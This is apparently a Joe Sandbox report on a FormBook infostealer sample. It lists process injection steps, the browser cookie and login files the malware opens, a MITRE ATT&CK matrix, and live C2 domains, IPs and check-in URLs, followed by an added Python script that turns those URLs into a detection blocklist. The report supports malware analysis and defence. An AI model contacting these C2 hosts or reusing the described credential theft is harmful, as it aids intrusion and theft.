                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_005148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_00574C53 mouse_event
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z6tNjJC614.exe"
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe, Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_00567CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_0056874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: z6tNjJC614.exe, Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: z6tNjJC614.exe, tFEgkRNveR.exe, 0000000B.00000000.1557056557.0000000001320000.00000002.00000001.00040000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000002.3127936219.0000000001321000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Shell_TrayWnd
                Source: tFEgkRNveR.exe, 0000000B.00000000.1557056557.0000000001320000.00000002.00000001.00040000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000002.3127936219.0000000001321000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progman
                Source: tFEgkRNveR.exe, 0000000B.00000000.1557056557.0000000001320000.00000002.00000001.00040000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000002.3127936219.0000000001321000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: ?Program Manager
                Source: tFEgkRNveR.exe, 0000000B.00000000.1557056557.0000000001320000.00000002.00000001.00040000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000002.3127936219.0000000001321000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_0053862B cpuid
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_00544E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_00551E06 GetUserNameW
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_00543F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_005149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match, File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3127852915.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1635105463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3124391485.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\winver.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: z6tNjJC614.exe, Binary or memory string: WIN_81
                Source: z6tNjJC614.exe, Binary or memory string: WIN_XP
                Source: z6tNjJC614.exe, Binary or memory string: WIN_XPe
                Source: z6tNjJC614.exe, Binary or memory string: WIN_VISTA
                Source: z6tNjJC614.exe, Binary or memory string: WIN_7
                Source: z6tNjJC614.exe, Binary or memory string: WIN_8
                Source: z6tNjJC614.exe, Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match, File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3127852915.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1635105463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.3124391485.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_00586283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\z6tNjJC614.exe, Code function: 0_2_00586747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (one tactic per line; a number before a technique is the count shown in that matrix cell)
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 312 Process Injection; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 312 Process Injection
                Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1588990, Sample: z6tNjJC614.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100
                Start, DNS/IP: www.rtpterbaruwaktu3.xyz; www.fortevision.xyz (Performs DNS queries to domains with low reputation); 13 other IPs or domains
                Start, signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures
                Start -> z6tNjJC614.exe 2 (started), signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                z6tNjJC614.exe -> svchost.exe (started), signatures: Maps a DLL or memory area into another process
                svchost.exe -> tFEgkRNveR.exe (injected), signatures: Found direct / indirect Syscall (likely to bypass EDR); DNS/IP: www.connecty.live 203.161.43.228 (ports 49994, 49995, 49996, VNPT-AS-VNVNPTCorpVN, Malaysia); rtpterbaruwaktu3.xyz 103.21.221.87 (ports 49986, 49987, 49988, LINKNET-ID-APLinknetASNID, unknown); 7 other IPs or domains
                tFEgkRNveR.exe -> winver.exe 13 (started), signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                winver.exe -> firefox.exe (started)

                Antivirus detection (Source / Detection / Scanner / Label):
                z6tNjJC614.exe / 83% / ReversingLabs / Win32.Trojan.AutoitInject
                z6tNjJC614.exe / 66% / Virustotal
                z6tNjJC614.exe / 100% / Joe Sandbox ML
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.prhmcjdz.tokyo/cm9a/0%Avira URL Cloudsafe
                http://www.bpgroup.site/mlxg/?QbUPL=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGraedJXjbbCkeYoQqBrGkjzfTHxGy2G2a4+AXnGm9DtiGGRVBQ2NqOGZfd&ef4=TJYXELnhFJhl0%Avira URL Cloudsafe
                http://www.bpgroup.site/mlxg/0%Avira URL Cloudsafe
                http://www.jijievo.site/z9pi/?QbUPL=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipuFwHgdvcemFSrMC8OxCAm29CGPtG+jrBp7iHLTW/uD4KAmAXSCgHgFK4&ef4=TJYXELnhFJhl0%Avira URL Cloudsafe
                http://www.tals.xyz/cpgr/0%Avira URL Cloudsafe
                http://www.prhmcjdz.tokyo/cm9a/?ef4=TJYXELnhFJhl&QbUPL=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvrBPGjvGvWTn9eE6YM8B8FSoiTH7Br/Ez7MnCgATlHy+hFK5SJ9epG9Mk0%Avira URL Cloudsafe
                http://www.ytsd88.top/8qt7/?QbUPL=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXiJxWYm89PNrsVDefynVEbypj6mz/ajpHDG/8Uzc6QbTSEQ6i7rwMVRjg&ef4=TJYXELnhFJhl0%Avira URL Cloudsafe
                http://www.tals.xyz/cpgr/?QbUPL=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjEi3gnykaux6zendXb1ybL2/XUTdEdLrQYsm3xUWbOyfaUl/C4vMGWlHL&ef4=TJYXELnhFJhl0%Avira URL Cloudsafe
                http://www.fortevision.xyz/dash/0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/mv7p/0%Avira URL Cloudsafe
                http://www.connecty.live/6urf/?QbUPL=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR7eoy7wVxfJ9K+U+MKKjLOsgjwrfTYLmZqfPCjIDk3pY25vWCr1O4NF+r&ef4=TJYXELnhFJhl0%Avira URL Cloudsafe
                http://www.50food.com/u9hy/0%Avira URL Cloudsafe
                http://www.connecty.live/6urf/0%Avira URL Cloudsafe
                http://www.ytsd88.top/8qt7/0%Avira URL Cloudsafe
                http://www.fortevision.xyz/dash/?ef4=TJYXELnhFJhl&QbUPL=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q1LAgUq3XcZwqztHS/MhxxHRy56C3xMKSUemxfPW4qvYN+c3Gdt63iP8z0%Avira URL Cloudsafe
                http://www.zriaraem-skiry.sbs0%Avira URL Cloudsafe
                http://www.zriaraem-skiry.sbs/f8c6/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.50food.com
                147.255.21.187
                truetrue
                  unknown
                  all.wjscdn.com
                  154.205.156.26
                  truefalse
                    high
                    ymx01.cn
                    8.218.14.120
                    truetrue
                      unknown
                      www.zriaraem-skiry.sbs
                      104.21.42.77
                      truetrue
                        unknown
                        bpgroup.site
                        74.48.143.82
                        truefalse
                          high
                          www.connecty.live
                          203.161.43.228
                          truetrue
                            unknown
                            www.tals.xyz
                            13.248.169.48
                            truefalse
                              high
                              www.ytsd88.top
                              47.76.213.197
                              truefalse
                                high
                                www.fortevision.xyz
                                13.248.169.48
                                truetrue
                                  unknown
                                  rtpterbaruwaktu3.xyz
                                  103.21.221.87
                                  truetrue
                                    unknown
                                    www.bpgroup.site
                                    unknown
                                    unknownfalse
                                      high
                                      www.rtpterbaruwaktu3.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.grandesofertas.fun
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.jijievo.site
                                          unknown
                                          unknownfalse
                                            high
                                            www.prhmcjdz.tokyo
                                            unknown
                                            unknownfalse
                                              unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.prhmcjdz.tokyo/cm9a/ | true | Avira URL Cloud: safe | unknown
http://www.ytsd88.top/8qt7/?QbUPL=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXiJxWYm89PNrsVDefynVEbypj6mz/ajpHDG/8Uzc6QbTSEQ6i7rwMVRjg&ef4=TJYXELnhFJhl | true | Avira URL Cloud: safe | unknown
http://www.fortevision.xyz/dash/ | true | Avira URL Cloud: safe | unknown
http://www.bpgroup.site/mlxg/?QbUPL=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGraedJXjbbCkeYoQqBrGkjzfTHxGy2G2a4+AXnGm9DtiGGRVBQ2NqOGZfd&ef4=TJYXELnhFJhl | true | Avira URL Cloud: safe | unknown
http://www.bpgroup.site/mlxg/ | true | Avira URL Cloud: safe | unknown
http://www.jijievo.site/z9pi/?QbUPL=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipuFwHgdvcemFSrMC8OxCAm29CGPtG+jrBp7iHLTW/uD4KAmAXSCgHgFK4&ef4=TJYXELnhFJhl | true | Avira URL Cloud: safe | unknown
http://www.tals.xyz/cpgr/ | true | Avira URL Cloud: safe | unknown
http://www.prhmcjdz.tokyo/cm9a/?ef4=TJYXELnhFJhl&QbUPL=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvrBPGjvGvWTn9eE6YM8B8FSoiTH7Br/Ez7MnCgATlHy+hFK5SJ9epG9Mk | true | Avira URL Cloud: safe | unknown
http://www.tals.xyz/cpgr/?QbUPL=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjEi3gnykaux6zendXb1ybL2/XUTdEdLrQYsm3xUWbOyfaUl/C4vMGWlHL&ef4=TJYXELnhFJhl | true | Avira URL Cloud: safe | unknown
http://www.rtpterbaruwaktu3.xyz/mv7p/ | true | Avira URL Cloud: safe | unknown
http://www.connecty.live/6urf/?QbUPL=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR7eoy7wVxfJ9K+U+MKKjLOsgjwrfTYLmZqfPCjIDk3pY25vWCr1O4NF+r&ef4=TJYXELnhFJhl | true | Avira URL Cloud: safe | unknown
http://www.50food.com/u9hy/ | true | Avira URL Cloud: safe | unknown
http://www.fortevision.xyz/dash/?ef4=TJYXELnhFJhl&QbUPL=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q1LAgUq3XcZwqztHS/MhxxHRy56C3xMKSUemxfPW4qvYN+c3Gdt63iP8z | true | Avira URL Cloud: safe | unknown
http://www.connecty.live/6urf/ | true | Avira URL Cloud: safe | unknown
http://www.ytsd88.top/8qt7/ | true | Avira URL Cloud: safe | unknown
http://www.zriaraem-skiry.sbs/f8c6/ | true | Avira URL Cloud: safe | unknown
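The URL table above shows the same shape on every C2 host: a four-character directory (cm9a, 8qt7, mlxg, ...) and, for the seven check-in URLs, exactly two query parameters, one long base64-looking blob under QbUPL and one short token, ef4=TJYXELnhFJhl, that is identical across all of them. The Python below is an added example, not part of the Joe Sandbox report, that parses those URLs, applies that shape as a detection heuristic, and aggregates what an analyst would pivot on: the distinct hosts to block, the parameter carrying the blob, and the shared token. The input list is a subset of the rows above with the fused "true" of the Malicious column stripped, plus two benign browser URLs copied from the memory-string table as negative cases; the shape check is my assumption drawn from these rows, not a published FormBook signature. One caveat the table itself makes plain: Avira URL Cloud rates every one of these URLs "safe" and the reputation column is "unknown", so a vendor-safe verdict on an unknown domain is no reason to drop the pattern.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed input: a subset of the URL column of the report's URL table
# (trailing "true" from the Malicious column removed) plus two benign URLs
# taken from the report's browser-string table as negative cases.
REPORT_URLS = [
    "http://www.prhmcjdz.tokyo/cm9a/",
    "http://www.ytsd88.top/8qt7/?QbUPL=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXiJxWYm89PNrsVDefynVEbypj6mz/ajpHDG/8Uzc6QbTSEQ6i7rwMVRjg&ef4=TJYXELnhFJhl",
    "http://www.fortevision.xyz/dash/",
    "http://www.bpgroup.site/mlxg/?QbUPL=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGraedJXjbbCkeYoQqBrGkjzfTHxGy2G2a4+AXnGm9DtiGGRVBQ2NqOGZfd&ef4=TJYXELnhFJhl",
    "http://www.jijievo.site/z9pi/?QbUPL=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipuFwHgdvcemFSrMC8OxCAm29CGPtG+jrBp7iHLTW/uD4KAmAXSCgHgFK4&ef4=TJYXELnhFJhl",
    "http://www.tals.xyz/cpgr/",
    "http://www.prhmcjdz.tokyo/cm9a/?ef4=TJYXELnhFJhl&QbUPL=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvrBPGjvGvWTn9eE6YM8B8FSoiTH7Br/Ez7MnCgATlHy+hFK5SJ9epG9Mk",
    "http://www.connecty.live/6urf/?QbUPL=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR7eoy7wVxfJ9K+U+MKKjLOsgjwrfTYLmZqfPCjIDk3pY25vWCr1O4NF+r&ef4=TJYXELnhFJhl",
    "http://www.rtpterbaruwaktu3.xyz/mv7p/",
    "http://www.50food.com/u9hy/",
    "http://www.zriaraem-skiry.sbs/f8c6/",
    "https://duckduckgo.com/ac/?q=",
    "https://www.bt.cn/?from=404",
]

# Beacon shape as observed in this report (an assumption drawn from the rows
# above, not a published FormBook signature): a four-character lowercase
# alphanumeric directory, and either no query string or exactly two
# parameters of which one is a long base64-like blob and one a short token.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")


def split_query(query):
    """Split a query string into (key, value) pairs without decoding.
    urllib's parse_qsl() would turn the '+' inside the blobs into spaces
    and break the base64 check, so the split is done by hand."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((key, value))
    return pairs


def parse_c2_url(url):
    parts = urlsplit(url)
    return {"host": parts.hostname, "path": parts.path,
            "params": split_query(parts.query)}


def classify(url):
    """Return 'c2_beacon', 'c2_path' or 'unrelated' for one URL."""
    rec = parse_c2_url(url)
    if not PATH_RE.match(rec["path"]):
        return "unrelated"
    if not rec["params"]:
        return "c2_path"          # bare directory, no payload
    blobs = [v for _, v in rec["params"] if BLOB_RE.match(v)]
    if len(rec["params"]) == 2 and len(blobs) == 1:
        return "c2_beacon"        # one blob plus one short token
    return "unrelated"


def summarize(urls):
    """Aggregate the pivots: hosts to block, the blob parameter name, and
    the short token that is shared across hosts."""
    counts = Counter()
    hosts, blob_keys, tokens = set(), set(), set()
    for url in urls:
        kind = classify(url)
        counts[kind] += 1
        if kind == "unrelated":
            continue
        rec = parse_c2_url(url)
        hosts.add(rec["host"])
        if kind == "c2_beacon":
            for key, value in rec["params"]:
                if BLOB_RE.match(value):
                    blob_keys.add(key)
                else:
                    tokens.add(value)
    return {"counts": dict(counts), "hosts": sorted(hosts),
            "blob_keys": blob_keys, "tokens": tokens}


if __name__ == "__main__":
    summary = summarize(REPORT_URLS)
    for host in summary["hosts"]:
        print(host)                # feed to a DNS sinkhole or proxy blocklist
    print(summary["counts"], summary["blob_keys"], summary["tokens"])
```

Run stand-alone it prints the ten C2 hosts followed by the per-class counts, the single blob key QbUPL and the single token TJYXELnhFJhl. The token is the more durable pivot: the hosts in this report rotate (the Context tables further down show other samples using different domains), while a constant value across every beacon of one sample is what you would search for in proxy logs to find other infections of the same build.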
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.bt.cn/?from=404 | tFEgkRNveR.exe, 0000000B.00000002.3133398918.00000000069C8000.00000004.80000000.00040000.00000000.sdmp, winver.exe, 0000000C.00000002.3128888701.00000000051E8000.00000004.10000000.00040000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | tFEgkRNveR.exe, 0000000B.00000002.3133398918.00000000071A2000.00000004.80000000.00040000.00000000.sdmp, winver.exe, 0000000C.00000002.3128888701.00000000059C2000.00000004.10000000.00040000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.zriaraem-skiry.sbs | tFEgkRNveR.exe, 0000000B.00000002.3136712972.0000000008744000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
203.161.43.228 | www.connecty.live | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
13.248.169.48 | www.tals.xyz | United States | 16509 | AMAZON-02US | false
104.21.42.77 | www.zriaraem-skiry.sbs | United States | 13335 | CLOUDFLARENETUS | true
103.21.221.87 | rtpterbaruwaktu3.xyz | unknown | 9905 | LINKNET-ID-APLinknetASNID | true
47.76.213.197 | www.ytsd88.top | United States | 9500 | VODAFONE-TRANSIT-ASVodafoneNZLtdNZ | false
154.205.156.26 | all.wjscdn.com | Seychelles | 26484 | IKGUL-26484US | false
147.255.21.187 | www.50food.com | United States | 7203 | LEASEWEB-USA-SFO-12US | true
8.218.14.120 | ymx01.cn | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
74.48.143.82 | bpgroup.site | Canada | 14663 | TELUS-3CA | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588990
Start date and time: 2025-01-11 08:14:49 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
